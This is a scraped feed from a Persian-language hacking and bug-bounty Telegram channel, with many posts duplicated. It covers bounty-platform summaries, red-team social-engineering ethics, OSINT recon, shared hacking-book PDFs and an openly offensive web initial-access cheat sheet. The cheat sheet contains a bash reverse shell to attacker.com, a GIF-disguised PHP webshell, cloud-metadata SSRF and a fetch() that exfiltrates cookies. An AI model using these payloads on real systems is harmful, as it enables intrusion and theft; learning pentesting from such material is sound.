📊 Watcher Summary Report
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 12 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
──────────────
📡 Follow :
👉 @zerosec_team
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 12 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
──────────────
📡 Follow :
👉 @zerosec_team
👍2🔥1
به نظر میرسه تلگرام، کانال گروه های «تپندگان» و «عدالت علی» را به دلیل ریپورت های فراوان مسدود
کردند
──────────────
📡 Follow :
👉 @zerosec_team
کردند
──────────────
📡 Follow :
👉 @zerosec_team
❤4🖕4
💡 اهمیت مهندسی اجتماعی در رد تیم:
1. عبور از لایههای فنی امنیتی
فایروال، آنتیویروس، WAF و سایر سیستمها ممکنه نفوذ فنی رو سخت کنن، اما کارمند سادهی بخش منابع انسانی ممکنه با یک تماس تلفنی فیشینگ، اطلاعات ورود رو در اختیار بذاره.
2. تست امنیت واقعی سازمان
هدف رد تیم، سنجش توانایی تشخیص و پاسخ به تهدیدات واقعیه. حملات مهندسی اجتماعی از رایجترین روشهای نفوذ در دنیای واقعیان، پس باید تست بشن.
3. جمعآوری اطلاعات اولیه (OSINT)
مهندسی اجتماعی باعث دسترسی به اطلاعاتی میشه که به روش فنی قابل دسترسی نیستند: مثلاً شماره داخلی یک مدیر یا ساختار دقیق سازمان.
4. شبیهسازی حملات APT
حملات APT واقعی معمولا با مهندسی اجتماعی شروع میشن (مثلاً spear phishing). رد تیم باید اینها رو شبیهسازی کنه.
──────────────
📡 Follow : 👉 @zerosec_team
1. عبور از لایههای فنی امنیتی
فایروال، آنتیویروس، WAF و سایر سیستمها ممکنه نفوذ فنی رو سخت کنن، اما کارمند سادهی بخش منابع انسانی ممکنه با یک تماس تلفنی فیشینگ، اطلاعات ورود رو در اختیار بذاره.
2. تست امنیت واقعی سازمان
هدف رد تیم، سنجش توانایی تشخیص و پاسخ به تهدیدات واقعیه. حملات مهندسی اجتماعی از رایجترین روشهای نفوذ در دنیای واقعیان، پس باید تست بشن.
3. جمعآوری اطلاعات اولیه (OSINT)
مهندسی اجتماعی باعث دسترسی به اطلاعاتی میشه که به روش فنی قابل دسترسی نیستند: مثلاً شماره داخلی یک مدیر یا ساختار دقیق سازمان.
4. شبیهسازی حملات APT
حملات APT واقعی معمولا با مهندسی اجتماعی شروع میشن (مثلاً spear phishing). رد تیم باید اینها رو شبیهسازی کنه.
──────────────
📡 Follow : 👉 @zerosec_team
❤3👍1
Reza Mohamadzade
💡 اهمیت مهندسی اجتماعی در رد تیم: 1. عبور از لایههای فنی امنیتی فایروال، آنتیویروس، WAF و سایر سیستمها ممکنه نفوذ فنی رو سخت کنن، اما کارمند سادهی بخش منابع انسانی ممکنه با یک تماس تلفنی فیشینگ، اطلاعات ورود رو در اختیار بذاره. 2. تست امنیت واقعی سازمان…
✅ بایدها:
🔍 جمعآوری دقیق اطلاعات (OSINT)
قبل از هر حمله، باید همهچیز رو درباره هدف بدونی: ساختار سازمان، ایمیل کارمندان، شمارهها، ابزارهای مورد استفاده و...
🎯 تعریف هدف مشخص
آیا دنبال دسترسی به شبکهای؟ کرنشیال؟ فایل خاص؟ همیشه هدفتو مشخص و مستند کن.
🎭 ساخت سناریوی باورپذیر
سناریوت باید واقعی به نظر برسه. مثلاً پشتیبان فنی، مسئول استخدام، یا بازرس امنیتی باشی.
🎬 تمرین اجرای سناریو
قبل از اجرا، سناریوت رو تمرین کن. لحن، زبان بدن، دیالوگها باید حرفهای باشن.
🛡 هماهنگی با کارفرما
محدودهها، مجوزها و محدودیتها باید در قالب Rules of Engagement (ROE) از قبل توافق بشن.
📝 مستندسازی
هر کاری که انجام دادی، موفق یا ناموفق، باید دقیق لاگ بشه. مخصوصاً برای گزارش نهایی.
_____________________________________
❌ نبایدها:
🚫 آسیب روحی به کارمندان
فریب باید کنترلشده باشه، نه باعث تحقیر، ترس یا استرس شدید.
🚫 تهدید یا اجبار
هیچوقت از تهدید یا زبان توهینآمیز برای تست استفاده نکن.
🚫 خروج از محدوده
هر اقدامی خارج از محدودهی تعیینشده (Scope) یعنی عبور از خط قرمز قانونی و اخلاقی.
🚫 ضبط مخفیانه بدون مجوز
ضبط صدا یا تصویر بدون اجازه ممکنه دردسر حقوقی داشته باشه.
🚫 تغییر دادههای واقعی
وظیفه تو تخریب نیست؛ فقط باید ضعفها رو نشون بدی.
🚫 افشای اطلاعات به خارج از تیم
اطلاعات جمعآوریشده فقط باید با کارفرما و تیم مجاز به اشتراک گذاشته بشه.
──────────────
📡 Follow : 👉 @zerosec_team
🔍 جمعآوری دقیق اطلاعات (OSINT)
قبل از هر حمله، باید همهچیز رو درباره هدف بدونی: ساختار سازمان، ایمیل کارمندان، شمارهها، ابزارهای مورد استفاده و...
🎯 تعریف هدف مشخص
آیا دنبال دسترسی به شبکهای؟ کرنشیال؟ فایل خاص؟ همیشه هدفتو مشخص و مستند کن.
🎭 ساخت سناریوی باورپذیر
سناریوت باید واقعی به نظر برسه. مثلاً پشتیبان فنی، مسئول استخدام، یا بازرس امنیتی باشی.
🎬 تمرین اجرای سناریو
قبل از اجرا، سناریوت رو تمرین کن. لحن، زبان بدن، دیالوگها باید حرفهای باشن.
🛡 هماهنگی با کارفرما
محدودهها، مجوزها و محدودیتها باید در قالب Rules of Engagement (ROE) از قبل توافق بشن.
📝 مستندسازی
هر کاری که انجام دادی، موفق یا ناموفق، باید دقیق لاگ بشه. مخصوصاً برای گزارش نهایی.
_____________________________________
❌ نبایدها:
🚫 آسیب روحی به کارمندان
فریب باید کنترلشده باشه، نه باعث تحقیر، ترس یا استرس شدید.
🚫 تهدید یا اجبار
هیچوقت از تهدید یا زبان توهینآمیز برای تست استفاده نکن.
🚫 خروج از محدوده
هر اقدامی خارج از محدودهی تعیینشده (Scope) یعنی عبور از خط قرمز قانونی و اخلاقی.
🚫 ضبط مخفیانه بدون مجوز
ضبط صدا یا تصویر بدون اجازه ممکنه دردسر حقوقی داشته باشه.
🚫 تغییر دادههای واقعی
وظیفه تو تخریب نیست؛ فقط باید ضعفها رو نشون بدی.
🚫 افشای اطلاعات به خارج از تیم
اطلاعات جمعآوریشده فقط باید با کارفرما و تیم مجاز به اشتراک گذاشته بشه.
──────────────
📡 Follow : 👉 @zerosec_team
❤4👍1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 27 new items
🔹 INTIGRITI: 10 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
──────────────
📡 Follow : 👉 @zerosec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 27 new items
🔹 INTIGRITI: 10 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
──────────────
📡 Follow : 👉 @zerosec_team
Telegram
ZeroSec Watcher
Respect each other, follow the rules, share only relevant hacking & security content, no spam or personal info leaks.
Our official channel: @zerosec_team
Our official channel: @zerosec_team
❤3
🎯 اکسپلویت آسیبپذیریهای وب برای دسترسی اولیه (Initial Access)
یه لیست توپ از تریکهایی که میتونی باهاشون از راه وب اپ دستتو بندازی داخل👇
🔥 1. RCE (Remote Code Execution)
مستقیم شل بفرست:
با curl یا wget اسکریپت اجرا کن
bypass فایروال با base64 یا ${IFS}
📂 2. File Upload
آپلود شل php، aspx، jsp
دور زدن فیلتر با:
shell.php.jpg یا shell.pHp
آپلود تصویری با کد PHP داخلش
💉 3. SQL Injection → RCE
INTO OUTFILE برای ریختن شل روی سرور
MSSQL و xp_cmdshell برای اجرای دستور مستقیم
🧬 4. Command Injection
تست با: ;id, |whoami, && curl
استفاده از ${IFS} یا $(command)
🔁 5. SSRF → RCE یا Info Leak
دسترسی به metadata سرور:
اتصال به Redis بدون پسورد برای نوشتن SSH Key
🔐 6. Auth Bypass → دسترسی به Admin Panel
JWT با الگوریتم none
تست مسیرهایی مثل /admin، /debug
📦 7. Deserialization → RCE
با ysoserial یا PHPGGC پِیلود بساز
اجرا از طریق پارامترهایی که داده سریالشده میگیرن
📁 8. LFI → RCE
Poison کردن لاگ با شل
Include کردن sessionهای PHP
Log read از مسیر:
⚡ 9. XSS → سرقت کوکی admin یا CSRF
Stored XSS برای اجرا روی پنل ادمین
دزدیدن کوکی با:
⚙️ 10. Misconfig → Access
phpMyAdmin بیپسورد
Jenkins باز
.env یا .git لو رفته
configهای AWS و DB بدون حفاظت
_______________________________
📡 Join us 👉 @zerosec_team
یه لیست توپ از تریکهایی که میتونی باهاشون از راه وب اپ دستتو بندازی داخل👇
🔥 1. RCE (Remote Code Execution)
مستقیم شل بفرست:
bash -i >& /dev/tcp/attacker.com/4444 0>&1
با curl یا wget اسکریپت اجرا کن
bypass فایروال با base64 یا ${IFS}
📂 2. File Upload
آپلود شل php، aspx، jsp
دور زدن فیلتر با:
shell.php.jpg یا shell.pHp
آپلود تصویری با کد PHP داخلش
GIF89a<?php system($_GET['cmd']); ?>
💉 3. SQL Injection → RCE
INTO OUTFILE برای ریختن شل روی سرور
MSSQL و xp_cmdshell برای اجرای دستور مستقیم
🧬 4. Command Injection
تست با: ;id, |whoami, && curl
استفاده از ${IFS} یا $(command)
🔁 5. SSRF → RCE یا Info Leak
دسترسی به metadata سرور:
http://169.254.169.254/...
اتصال به Redis بدون پسورد برای نوشتن SSH Key
🔐 6. Auth Bypass → دسترسی به Admin Panel
JWT با الگوریتم none
تست مسیرهایی مثل /admin، /debug
📦 7. Deserialization → RCE
با ysoserial یا PHPGGC پِیلود بساز
اجرا از طریق پارامترهایی که داده سریالشده میگیرن
📁 8. LFI → RCE
Poison کردن لاگ با شل
Include کردن sessionهای PHP
Log read از مسیر:
/var/log/apache2/access.log
⚡ 9. XSS → سرقت کوکی admin یا CSRF
Stored XSS برای اجرا روی پنل ادمین
دزدیدن کوکی با:
fetch("https://attacker.com?c="+document.cookie)⚙️ 10. Misconfig → Access
phpMyAdmin بیپسورد
Jenkins باز
.env یا .git لو رفته
configهای AWS و DB بدون حفاظت
_______________________________
📡 Join us 👉 @zerosec_team
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
❤4
هک فقط تو باگ بانتی خلاصه میشه؟ 🤔
+ That’s not my library!
+ Just Raspberry Pi book😍
_______________________________
📡 Join us 👉 @zerosec_team
+ That’s not my library!
+ Just Raspberry Pi book😍
_______________________________
📡 Join us 👉 @zerosec_team
⚡3👍2🔥1😁1😍1
فکت :
جوری که مردم بخاطر ارزش پایین پول ملی رو اوردن به باگ بانتی و ترید واقعا پشم ریزونه
👎
_______________________________
📡 Join us 👉 @zerosec_team
_______________________________
📡 Join us 👉 @zerosec_team
👍11👎3
Violent_python_a_cookbook_for_hackers,_forensic_analysts,_T_J_OConnor.pdf
1.5 MB
Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers
#Book
_______________________________
📡 Join us 👉 @zerosec_team
#Book
_______________________________
📡 Join us 👉 @zerosec_team
❤2👍1
Black_Hat_Python,_2nd_Edition_Python_Programming_for_Seitz,_Justin.pdf
10 MB
Black Hat Python: Python Programming for Hackers and Pentesters
#Book
_______________________________
📡 Join us 👉 @zerosec_team
#Book
_______________________________
📡 Join us 👉 @zerosec_team
❤2🔥1
THE HACKER PLAYBOOK.pdf
8.7 MB
The Hacker Playbook 3: Practical Guide To Penetration Testing
#Book
_______________________________
📡 Join us 👉 @zerosec_team
#Book
_______________________________
📡 Join us 👉 @zerosec_team
❤1🔥1
No.Starch.Press.Rootkits.and.Bootkit.pdf
12.1 MB
Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats
#Book
_______________________________
📡 Join us 👉 @zerosec_team
#Book
_______________________________
📡 Join us 👉 @zerosec_team
🔥2❤1
Sin0x001
Violent_python_a_cookbook_for_hackers,_forensic_analysts,_T_J_OConnor.pdf
به جای دیدن دوره های بی سر و ته کتاب بخونید و تمرین کنید
Read
Practice
Repeat
_______________________________
📡 Join us 👉 @zerosec_team
Read
Practice
Repeat
"Knowledge is power."
— Francis Bacon
_______________________________
📡 Join us 👉 @zerosec_team
👍3❤2
فکت:
جایگاه باگ هانترا تو هک و امنیت معادل ورد پرس کارا بین طراح های سایت هاست🤣
_______________________________
📡 Join us 👉 @zerosec_team
📡 Join us 👉 @zerosec_team
🤣14🥰1😁1💅1
کدام یک از گروه های زیر دانش بیشتری دارن؟
Anonymous Quiz
7%
Pentester
21%
Security Researchers
46%
APTs
8%
Bug Hunter
18%
Red Teams
❤2👏1🐳1
RadvanSec
کدام یک از گروه های زیر دانش بیشتری دارن؟
چرا APTها دانش بیشتری دارن؟
حمایت مالی و تیمی دارن (معمولاً توسط دولتها)
زمان زیادی برای تحقیق و تست دارن
به آسیبپذیریهای (Zero-Day) دسترسی دارن
شبکه، سیستمعامل و ابزارهای دفاعی رو عمیقاً میفهمن
ردپا پاک میکنن و ماندگار میمونن بدون شناسایی
_______________________________
📡 Join us 👉 @zerosec_team
حمایت مالی و تیمی دارن (معمولاً توسط دولتها)
زمان زیادی برای تحقیق و تست دارن
به آسیبپذیریهای (Zero-Day) دسترسی دارن
شبکه، سیستمعامل و ابزارهای دفاعی رو عمیقاً میفهمن
ردپا پاک میکنن و ماندگار میمونن بدون شناسایی
_______________________________
📡 Join us 👉 @zerosec_team
👍5
📊 Watcher Summary Report
🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 1 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
──────────────
📡 Follow :
👉 @zerosec_team
🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 1 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
──────────────
📡 Follow :
👉 @zerosec_team
❤1👍1🤩1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
──────────────
📡 Follow :
👉 @zerosec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
──────────────
📡 Follow :
👉 @zerosec_team
Telegram
ZeroSec Watcher
Respect each other, follow the rules, share only relevant hacking & security content, no spam or personal info leaks.
Our official channel: @zerosec_team
Our official channel: @zerosec_team
❤2👏1
📌 نقش و جایگاه OSINT در باگبانتی:
1. 🎯 پیدا کردن اهداف مخفی (Scope Discovery)
با استفاده از OSINT میتونی:
سابدامینهایی پیدا کنی که توی داکیومنت رسمی نیستن
زیرساختهایی رو کشف کنی که در اسکوپ هستن ولی مستند نشدهان (مانند staging، test، admin، dev)
سرویسهایی مثل:
dev-payments.target.com
stg-api.targetcdn.net
خیلی وقتا باگهای حیاتی توی همین subdomainهای فراموششده پیدا میشن.
2. 🧠 فهم بهتر ساختار شرکت و تکنولوژیها
با تکنیکهای OSINT میتونی:
بفهمی شرکت با چی ساخته شده (Tech stack: React, Laravel, NGINX, AWS...)
بفهمی تیم dev چطور deploy میکنن
ایمیلهای کارکنان رو دربیاری (که به درد مهندسی اجتماعی یا رمز عبورهای قابل حدس میخوره)
3. 🔑 Credential Stuffing و کشف اطلاعات حساس
با سرچ در:
GitHub
Pastebin
Google Dork
میتونی دسترسیهایی مثل:
توکنهای API
رمزهای پیشفرض
دامپ دیتابیس
فایلهای env لو رفته
پیدا کنی و باهاشون ورود کنی یا آسیبپذیری کشف کنی.
4. 🔍 شناسایی حملهپذیریها از روی سوشالمدیا و بلاگها
پستهای کارکنان در لینکدین یا توییتر میتونه اطلاعاتی مثل:
فریمورکها
دامنههای در حال توسعه
تغییرات در سیستم auth
رو لو بده.
5. 📎 اتصال چند تکه اطلاعات به هم (Correlation)
مثلاً:
از طریق GitHub یه توکن میگیری
با اون به subdomainی که از crt.sh پیدا کردی auth میکنی
و در نهایت یه RCE میگیری
اینا فقط وقتی ممکن میشن که OSINT قوی باشه.
──────────────
📡 Follow :
👉 @zerosec_team
1. 🎯 پیدا کردن اهداف مخفی (Scope Discovery)
با استفاده از OSINT میتونی:
سابدامینهایی پیدا کنی که توی داکیومنت رسمی نیستن
زیرساختهایی رو کشف کنی که در اسکوپ هستن ولی مستند نشدهان (مانند staging، test، admin، dev)
سرویسهایی مثل:
dev-payments.target.com
stg-api.targetcdn.net
خیلی وقتا باگهای حیاتی توی همین subdomainهای فراموششده پیدا میشن.
2. 🧠 فهم بهتر ساختار شرکت و تکنولوژیها
با تکنیکهای OSINT میتونی:
بفهمی شرکت با چی ساخته شده (Tech stack: React, Laravel, NGINX, AWS...)
بفهمی تیم dev چطور deploy میکنن
ایمیلهای کارکنان رو دربیاری (که به درد مهندسی اجتماعی یا رمز عبورهای قابل حدس میخوره)
3. 🔑 Credential Stuffing و کشف اطلاعات حساس
با سرچ در:
GitHub
Pastebin
Google Dork
میتونی دسترسیهایی مثل:
توکنهای API
رمزهای پیشفرض
دامپ دیتابیس
فایلهای env لو رفته
پیدا کنی و باهاشون ورود کنی یا آسیبپذیری کشف کنی.
4. 🔍 شناسایی حملهپذیریها از روی سوشالمدیا و بلاگها
پستهای کارکنان در لینکدین یا توییتر میتونه اطلاعاتی مثل:
فریمورکها
دامنههای در حال توسعه
تغییرات در سیستم auth
رو لو بده.
5. 📎 اتصال چند تکه اطلاعات به هم (Correlation)
مثلاً:
از طریق GitHub یه توکن میگیری
با اون به subdomainی که از crt.sh پیدا کردی auth میکنی
و در نهایت یه RCE میگیری
اینا فقط وقتی ممکن میشن که OSINT قوی باشه.
──────────────
📡 Follow :
👉 @zerosec_team
❤2⚡1👾1